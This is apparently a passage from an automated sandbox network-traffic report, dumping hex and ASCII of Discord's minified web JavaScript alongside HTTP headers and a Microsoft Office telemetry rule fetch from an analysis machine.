                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 3c 65 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 76 2b 3d 65 5b 67 5d 2e 74 6f 74 61 6c 43 6f 75 6e 74 3b 66 6f 72 28 76 61 72 20 6d 3d 41 72 72 61 79 28 76 29 2c 54 3d 30 2c 67 3d 30 3b 67 3c 6f 3b 67 2b 2b 29 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 67 3c 69 5b 6c 5d 2e 6c 65 6e 67 74 68 26 26 28 6d 5b 54 2b 2b 5d 3d 69 5b 6c 5d 5b 67 5d 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 6e 3b 67 2b 2b 29 66 6f 72 28 76 61 72 20 6c 3d 30 3b 6c 3c 65 2e 6c 65 6e 67 74 68 3b 6c 2b 2b 29 67 3c 73 5b 6c 5d 2e 6c 65 6e 67 74 68 26 26 28 6d 5b 54 2b 2b 5d 3d 73 5b 6c 5d 5b 67 5d 29 3b 72 65 74 75 72 6e 20 6d 7d 2c 74 2e 65 78 70 6f 72 74 73 3d 73 7d 2c 38 36 30 33 37 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72
                                                                                                                                                                                                                                                                                    Data Ascii: <e.length;g++)v+=e[g].totalCount;for(var m=Array(v),T=0,g=0;g<o;g++)for(var l=0;l<e.length;l++)g<i[l].length&&(m[T++]=i[l][g]);for(var g=0;g<n;g++)for(var l=0;l<e.length;l++)g<s[l].length&&(m[T++]=s[l][g]);return m},t.exports=s},860377:function(t,e,r){var
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 2c 31 2c 31 35 31 2c 31 32 31 5d 2c 5b 39 2c 36 39 2c 34 33 2c 34 2c 37 30 2c 34 34 5d 2c 5b 31 37 2c 35 30 2c 32 32 2c 31 2c 35 31 2c 32 33 5d 2c 5b 32 2c 34 32 2c 31 34 2c 31 39 2c 34 33 2c 31 35 5d 2c 5b 33 2c 31 34 31 2c 31 31 33 2c 34 2c 31 34 32 2c 31 31 34 5d 2c 5b 33 2c 37 30 2c 34 34 2c 31 31 2c 37 31 2c 34 35 5d 2c 5b 31 37 2c 34 37 2c 32 31 2c 34 2c 34 38 2c 32 32 5d 2c 5b 39 2c 33 39 2c 31 33 2c 31 36 2c 34 30 2c 31 34 5d 2c 5b 33 2c 31 33 35 2c 31 30 37 2c 35 2c 31 33 36 2c 31 30 38 5d 2c 5b 33 2c 36 37 2c 34 31 2c 31 33 2c 36 38 2c 34 32 5d 2c 5b 31 35 2c 35 34 2c 32 34 2c 35 2c 35 35 2c 32 35 5d 2c 5b 31 35 2c 34 33 2c 31 35 2c 31 30 2c 34 34 2c 31 36 5d 2c 5b 34 2c 31 34 34 2c 31 31 36 2c 34 2c 31 34 35 2c 31 31 37 5d 2c 5b 31 37 2c 36 38
                                                                                                                                                                                                                                                                                    Data Ascii: ,1,151,121],[9,69,43,4,70,44],[17,50,22,1,51,23],[2,42,14,19,43,15],[3,141,113,4,142,114],[3,70,44,11,71,45],[17,47,21,4,48,22],[9,39,13,16,40,14],[3,135,107,5,136,108],[3,67,41,13,68,42],[15,54,24,5,55,25],[15,43,15,10,44,16],[4,144,116,4,145,117],[17,68
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 39 2c 35 34 2c 32 34 2c 31 34 2c 35 35 2c 32 35 5d 2c 5b 32 32 2c 34 35 2c 31 35 2c 34 31 2c 34 36 2c 31 36 5d 2c 5b 36 2c 31 35 31 2c 31 32 31 2c 31 34 2c 31 35 32 2c 31 32 32 5d 2c 5b 36 2c 37 35 2c 34 37 2c 33 34 2c 37 36 2c 34 38 5d 2c 5b 34 36 2c 35 34 2c 32 34 2c 31 30 2c 35 35 2c 32 35 5d 2c 5b 32 2c 34 35 2c 31 35 2c 36 34 2c 34 36 2c 31 36 5d 2c 5b 31 37 2c 31 35 32 2c 31 32 32 2c 34 2c 31 35 33 2c 31 32 33 5d 2c 5b 32 39 2c 37 34 2c 34 36 2c 31 34 2c 37 35 2c 34 37 5d 2c 5b 34 39 2c 35 34 2c 32 34 2c 31 30 2c 35 35 2c 32 35 5d 2c 5b 32 34 2c 34 35 2c 31 35 2c 34 36 2c 34 36 2c 31 36 5d 2c 5b 34 2c 31 35 32 2c 31 32 32 2c 31 38 2c 31 35 33 2c 31 32 33 5d 2c 5b 31 33 2c 37 34 2c 34 36 2c 33 32 2c 37 35 2c 34 37 5d 2c 5b 34 38 2c 35 34 2c 32 34 2c
                                                                                                                                                                                                                                                                                    Data Ascii: 9,54,24,14,55,25],[22,45,15,41,46,16],[6,151,121,14,152,122],[6,75,47,34,76,48],[46,54,24,10,55,25],[2,45,15,64,46,16],[17,152,122,4,153,123],[29,74,46,14,75,47],[49,54,24,10,55,25],[24,45,15,46,46,16],[4,152,122,18,153,123],[13,74,46,32,75,47],[48,54,24,
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 72 3b 74 2e 65 78 70 6f 72 74 73 3d 65 7d 2c 33 33 38 30 39 31 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 7b 4d 4f 44 45 5f 4e 55 4d 42 45 52 3a 31 2c 4d 4f 44 45 5f 41 4c 50 48 41 5f 4e 55 4d 3a 32 2c 4d 4f 44 45 5f 38 42 49 54 5f 42 59 54 45 3a 34 2c 4d 4f 44 45 5f 4b 41 4e 4a 49 3a 38 7d 7d 2c 37 34 36 32 37 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 76 61 72 20 6f 3d 72 28 33 33 38 30 39 31 29 2c 6e 3d 72 28 36 36 39 30 31 33 29 2c 69 3d 72 28 34 36 35 37 35 38 29 2c 61 3d 7b 50 41 54 54 45 52 4e 30 30 30 3a 30 2c 50 41 54 54 45 52 4e 30 30 31 3a 31 2c 50 41 54 54 45 52 4e 30 31 30 3a 32 2c 50 41 54 54 45 52 4e 30 31 31 3a 33 2c 50 41 54 54 45 52 4e 31 30 30 3a 34 2c 50 41 54 54 45 52 4e 31 30 31 3a 35 2c 50 41 54
                                                                                                                                                                                                                                                                                    Data Ascii: r;t.exports=e},338091:function(t){t.exports={MODE_NUMBER:1,MODE_ALPHA_NUM:2,MODE_8BIT_BYTE:4,MODE_KANJI:8}},746272:function(t,e,r){var o=r(338091),n=r(669013),i=r(465758),a={PATTERN000:0,PATTERN001:1,PATTERN010:2,PATTERN011:3,PATTERN100:4,PATTERN101:5,PAT


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    101192.168.2.549824162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC862OUTGET /assets/3c99eb87778b9ed038d5.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 18462
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0f00b6042b7-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "3c20b3592827c7ba965c3553423f6d7a"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 25 Oct 2024 15:13:16 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2B4aOE%2FMpPStHC52iEcC8n8iFBfFLgvUt3PWxCnwyDyDmNC8STcq9470nk4Zbs6Ok9y6J7RI2BuO22u6rZjJ9t3Lu4O6d%2BDAWGEEswTBmxOckIYSM5L1IzNqo6BS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC407INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 30 30 31 31 22 5d 2c 7b 34 38 32 36 38 32 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 65 62 62 35 62 34 31 64 65 38 32 33 66 62 63 31 39 64 31 32 2e 70 6e 67 22 7d 2c 34 35 30 31 32 35 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 31 65 34 39 33 32 61 37 61 66 62 62 31 66 63 64 62 61 32 64 2e 70 6e 67 22 7d 2c 37 33 33 39 34 39 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 22 2f
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20011"],{482682:function(t){t.exports="/assets/ebb5b41de823fbc19d12.png"},450125:function(t){t.exports="/assets/1e4932a7afbb1fcdba2d.png"},733949:function(t){t.exports="/
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 72 6e 20 69 20 69 6e 20 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 69 5d 3d 65 2c 74 7d 6c 65 74 20 64 3d 74 3d 3e 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 69 2c 65 29 3d 3e 7b 6e 75 6c 6c 3d 3d 74 26 26 65 28 45 72 72 6f 72 28 22 4e 6f 20 69 6d 61 67 65 20 73 72 63 20 70 61 73 73 65 64 22 29 29 3b 6c 65 74 20 73 3d 6e 65 77 20 49 6d 61 67 65 3b 73 2e 73 72 63 3d 74 2c 73 2e 6f 6e 6c 6f 61 64 3d 28 29 3d 3e 69 28 73 29 2c 73 2e 6f 6e 65 72 72 6f 72 3d 74 3d 3e 65 28 74 29 7d 29 3b 63 6c 61 73 73 20 75 20 65 78 74 65 6e 64 73 28 73 3d 68 2e 50 75 72 65 43
                                                                                                                                                                                                                                                                                    Data Ascii: rn i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let d=t=>new Promise((i,e)=>{null==t&&e(Error("No image src passed"));let s=new Image;s.src=t,s.onload=()=>i(s),s.onerror=t=>e(t)});class u extends(s=h.PureC
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 70 73 2e 73 68 6f 77 3f 31 3a 30 29 7d 67 65 74 41 6e 69 6d 61 74 65 64 53 74 79 6c 65 28 29 7b 6c 65 74 7b 61 6e 69 6d 3a 74 7d 3d 74 68 69 73 2c 7b 72 65 64 75 63 65 64 4d 6f 74 69 6f 6e 3a 69 7d 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 3b 72 65 74 75 72 6e 7b 6f 70 61 63 69 74 79 3a 74 2c 74 72 61 6e 73 66 6f 72 6d 3a 69 2e 65 6e 61 62 6c 65 64 3f 76 6f 69 64 20 30 3a 5b 7b 74 72 61 6e 73 6c 61 74 65 59 3a 74 2e 69 6e 74 65 72 70 6f 6c 61 74 65 28 7b 69 6e 70 75 74 52 61 6e 67 65 3a 5b 30 2c 31 5d 2c 6f 75 74 70 75 74 52 61 6e 67 65 3a 5b 22 2d 31 30 30 70 78 22 2c 22 30 70 78 22 5d 7d 29 7d 2c 7b 74 72 61 6e 73 6c 61 74 65 5a 3a 30 7d 5d 7d 7d 72 65 6e 64 65 72 28 29 7b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 29 28 6c 2e 5a 2e 61 2c 7b 68 72 65 66 3a
                                                                                                                                                                                                                                                                                    Data Ascii: ps.show?1:0)}getAnimatedStyle(){let{anim:t}=this,{reducedMotion:i}=this.context;return{opacity:t,transform:i.enabled?void 0:[{translateY:t.interpolate({inputRange:[0,1],outputRange:["-100px","0px"]})},{translateZ:0}]}}render(){return(0,n.jsx)(l.Z.a,{href:
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 72 45 61 63 68 28 74 3d 3e 74 2e 74 65 72 6d 69 6e 61 74 65 28 29 29 7d 62 69 6e 64 45 76 65 6e 74 73 28 29 7b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 74 68 69 73 2e 72 65 73 69 7a 65 43 61 6e 76 61 73 2c 21 31 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 74 68 69 73 2e 64 65 6c 61 79 65 64 50 61 75 73 65 2c 21 31 29 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 6f 63 75 73 22 2c 74 68 69 73 2e 70 6c 61 79 2c 21 31 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 56 69 73 69 62 69 6c 69
                                                                                                                                                                                                                                                                                    Data Ascii: rEach(t=>t.terminate())}bindEvents(){window.addEventListener("resize",this.resizeCanvas,!1),window.addEventListener("blur",this.delayedPause,!1),window.addEventListener("focus",this.play,!1),document.addEventListener("visibilitychange",this.handleVisibili
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 7d 29 7d 29 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 63 61 6e 76 61 73 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 72 28 29 28 77 2e 63 61 6e 76 61 73 2c 7b 5b 77 2e 65 6d 62 65 64 64 65 64 5d 3a 65 7d 29 2c 72 65 66 3a 74 68 69 73 2e 73 65 74 43 61 6e 76 61 73 7d 29 7d 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 73 75 70 65 72 28 74 29 2c 62 28 74 68 69 73 2c 22 77 69 64 74 68 22 2c 30 29 2c 62 28 74 68 69 73 2c 22 68 65 69 67 68 74 22 2c 30 29 2c 62 28 74 68 69 73 2c 22 63 61 6e 76 61 73 22 2c 76 6f 69 64 20 30 29 2c 62 28 74 68 69 73 2c 22 63 61 6e 76 61 73 43 6f 6e 74 65 78 74 22 2c 76 6f 69 64 20 30 29 2c 62 28 74 68 69 73 2c 22 63 68 69 6c 64 72 65 6e 22 2c 5b 5d 29 2c 62 28 74 68 69 73 2c 22 77 61 76 65 22 2c 76 6f 69 64 20 30 29 2c 62 28 74 68 69
                                                                                                                                                                                                                                                                                    Data Ascii: })}):(0,n.jsx)("canvas",{className:r()(w.canvas,{[w.embedded]:e}),ref:this.setCanvas})}})}constructor(t){super(t),b(this,"width",0),b(this,"height",0),b(this,"canvas",void 0),b(this,"canvasContext",void 0),b(this,"children",[]),b(this,"wave",void 0),b(thi
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 65 6f 75 74 29 2c 74 68 69 73 2e 5f 69 73 50 6c 61 79 69 6e 67 3d 21 31 2c 6e 75 6c 6c 21 3d 74 68 69 73 2e 5f 72 65 71 41 6e 69 6d 49 64 26 26 77 69 6e 64 6f 77 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 68 69 73 2e 5f 72 65 71 41 6e 69 6d 49 64 29 2c 74 68 69 73 2e 5f 72 65 71 41 6e 69 6d 49 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 61 64 76 61 6e 63 65 54 72 61 6e 73 69 74 69 6f 6e 61 6c 53 74 61 74 65 28 29 7d 29 2c 62 28 74 68 69 73 2c 22 64 65 6c 61 79 65 64 50 61 75 73 65 22 2c 28 29 3d 3e 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 70 61 75 73 65 54 69 6d 65 6f 75 74 29 2c 74 68 69 73 2e 5f 70 61 75 73 65 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 70 61 75 73 65 2c 34 65 33 29 7d 29
                                                                                                                                                                                                                                                                                    Data Ascii: eout),this._isPlaying=!1,null!=this._reqAnimId&&window.cancelAnimationFrame(this._reqAnimId),this._reqAnimId=null,this.advanceTransitionalState()}),b(this,"delayedPause",()=>{clearTimeout(this._pauseTimeout),this._pauseTimeout=setTimeout(this.pause,4e3)})
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 68 3a 65 2c 69 6e 6e 65 72 48 65 69 67 68 74 3a 73 7d 3d 77 69 6e 64 6f 77 3b 69 66 28 30 3d 3d 3d 74 7c 7c 30 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6e 3d 69 2f 74 2c 68 3d 65 2c 61 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 65 2a 6e 29 3b 72 65 74 75 72 6e 20 61 3c 73 26 26 28 61 3d 73 2c 68 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 73 2a 28 6e 3d 74 2f 69 29 29 29 2c 7b 6e 61 74 75 72 61 6c 57 69 64 74 68 3a 74 2c 6e 61 74 75 72 61 6c 48 65 69 67 68 74 3a 69 2c 77 69 64 74 68 3a 68 2c 68 65 69 67 68 74 3a 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 77 28 74 29 7b 6c 65 74 7b 73 70 6c 61 73 68 3a 69 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 3d 74 2c 5b 7b 77 69 64 74 68 3a 73 2c 68 65 69 67 68 74 3a 61 7d 2c 6c 5d 3d 68 2e 75 73 65 53 74 61 74 65 28 7b 77
                                                                                                                                                                                                                                                                                    Data Ascii: h:e,innerHeight:s}=window;if(0===t||0===i)return null;let n=i/t,h=e,a=Math.round(e*n);return a<s&&(a=s,h=Math.round(s*(n=t/i))),{naturalWidth:t,naturalHeight:i,width:h,height:a}}function w(t){let{splash:i,children:e}=t,[{width:s,height:a},l]=h.useState({w
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 6c 6c 62 61 63 6b 3a 21 68 7d 29 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6d 2e 6d 6f 62 69 6c 65 57 61 76 65 7d 29 7d 72 65 6e 64 65 72 43 6f 6e 74 65 6e 74 28 29 7b 6c 65 74 7b 63 68 69 6c 64 72 65 6e 3a 74 2c 77 61 76 65 53 74 61 74 65 3a 69 2c 73 68 6f 77 4c 6f 67 6f 3a 65 2c 6c 6f 67 6f 43 6c 61 73 73 4e 61 6d 65 3a 73 2c 65 6d 62 65 64 64 65 64 3a 61 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 7b 73 68 6f 77 57 61 76 65 41 6e 69 6d 61 74 69 6f 6e 3a 6c 7d 3d 74 68 69 73 2e 73 74 61 74 65 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 73 29 28 68 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 68 69 73 2e 72 65 6e 64 65 72 57 61 76 65 28 29 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b
                                                                                                                                                                                                                                                                                    Data Ascii: llback:!h}):(0,n.jsx)("div",{className:m.mobileWave})}renderContent(){let{children:t,waveState:i,showLogo:e,logoClassName:s,embedded:a}=this.props,{showWaveAnimation:l}=this.state;return(0,n.jsxs)(h.Fragment,{children:[this.renderWave(),(0,n.jsxs)("div",{
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 69 5d 3d 65 2c 74 7d 69 2e 5a 3d 63 6c 61 73 73 20 74 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 74 68 69 73 2e 69 6d 67 3d 6e 65 77 20 49 6d 61 67 65 2c 74 68 69 73 2e 69 6d 67 2e 6f 6e 6c 6f 61 64 3d 28 29 3d 3e 7b 74 68 69 73 2e 6c 6f 61 64 65 64 3d 21 30 7d 2c 74 68 69 73 2e 69 6d 67 2e 73 72 63 3d 6e 2c 74 68 69 73 2e 62 69 6e 64 28 29 7d 62 69 6e 64 28 29 7b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 4d 6f 75 73 65 4d 6f 76 65 2c 21 31 29 7d 75 6e 62 69 6e 64 28 29 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65
                                                                                                                                                                                                                                                                                    Data Ascii: e:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}i.Z=class t{initialize(){this.img=new Image,this.img.onload=()=>{this.loaded=!0},this.img.src=n,this.bind()}bind(){window.addEventListener("mousemove",this.handleMouseMove,!1)}unbind(){window.remove
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC1369INData Raw: 28 38 39 38 36 32 35 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 69 2c 65 29 7b 72 65 74 75 72 6e 20 69 20 69 6e 20 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 69 5d 3d 65 2c 74 7d 6c 65 74 20 61 3d 5b 22 23 37 64 38 31 38 37 22 2c 22 23 31 38 31 39 31 63 22 2c 22 23 38 66 61 32 64 66 22 2c 22 23 34 66 35 34 35 63 22 5d 3b 69 2e 5a 3d 63 6c 61 73 73 20 74 7b 63 68 65 63 6b 42 6f 75 6e 64 73 28 29 7b 74 68 69 73 2e 78 3e 74 68 69 73 2e 6f 66 66 73 63 72 65 65 6e 58 3f 74 68 69 73 2e 78 3d 2d 74 68 69 73 2e 73 69 7a 65 3a 74 68 69 73 2e 79 3e 74 68 69 73
                                                                                                                                                                                                                                                                                    Data Ascii: (898625);function h(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let a=["#7d8187","#18191c","#8fa2df","#4f545c"];i.Z=class t{checkBounds(){this.x>this.offscreenX?this.x=-this.size:this.y>this


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    102192.168.2.54981713.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:47 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 15dd4eb7-201e-0051-500a-3d7340000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201248Z-178bfbc474bfw4gbhC1NYCunf400000004z00000000092ya
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:48 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    103192.168.2.54981813.107.246.63443
